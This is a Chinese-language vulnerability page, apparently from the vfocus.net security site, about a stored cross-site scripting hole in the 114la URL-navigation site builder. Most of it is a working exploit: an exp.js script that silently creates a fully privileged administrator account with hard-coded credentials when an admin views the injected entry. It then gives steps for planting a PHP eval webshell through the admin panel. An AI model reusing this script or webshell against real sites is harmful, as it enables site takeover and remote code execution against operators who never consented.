首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
114啦网址导航建站系统跨站漏洞与利用
来源:vfocus.net 作者:vfocus 发布时间:2010-08-02  

114啦网址导航是目前国内使用率最高的网址导航之一,本网址导航生成系统为雨林木风自主研发.
漏洞分析:

程序当中的/url-submit/index.php对提交的数据未过滤或编码直接插入数据库,造成了储蓄性XSS漏洞


漏洞利用:

exp.js

//添加一个管理员账户       var siteurl = document.URL;       siteurlsiteurl = siteurl.replace(/(.*\/){0,}([^\.]+).*/ig,"$1");       var username="sogili";//用户名       var password="sb250";//密码       var request = false;             if(window.XMLHttpRequest) {       request = new XMLHttpRequest();       if(request.overrideMimeType) {       request.overrideMimeType('text/xml');       }       } else if(window.ActiveXObject) {       var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];       for(var i=0; i<versions.length; i++) {       try {       request = new ActiveXObject(versions[i]);       } catch(e)        {}       }       }             var xmlhttp=request;             xmlhttp.open("GET",siteurl+"/index.php?c=member", false);       xmlhttp.setRequestHeader("Referer", siteurl);       xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");       xmlhttp.send();       if (xmlhttp.responseText.indexOf(username)<0) {       xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_add", false);       xmlhttp.setRequestHeader("Referer", siteurl);       xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");       xmlhttp.send("name=" + username + "&password=" + password + "&step=2");             xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_edit", false);       xmlhttp.setRequestHeader("Referer", siteurl);       xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");       xmlhttp.send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan%5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username);       }      后台获得webshell:

数据管理->申请收录版块->插入<{php}>@eval($_POST['a']);<{/php}> -> shell:url-submit/index.php


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·MyPHP Forum SQL注入漏洞
·Struts2/XWork 安全漏洞及解决办
·天缘学校网站系统 v1.3 上传漏洞
·PHPCMS2008 sp3、sp4 SQL注入漏
·中嘉华诚内核加固免疫系统单机版
·Struts2和Webwork远程命令执行漏
·最新 phpcms 0day(图)
·Windows Win32k.sys 窗口创建漏
·超级巡警 <= v4 Build0316 ASTDr
·v5shop 网上商城系统通杀oday
·FreeBSD Kernel nfs_mount漏洞分
·dedecms v5.3-v5.6 Get Shell 0d
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved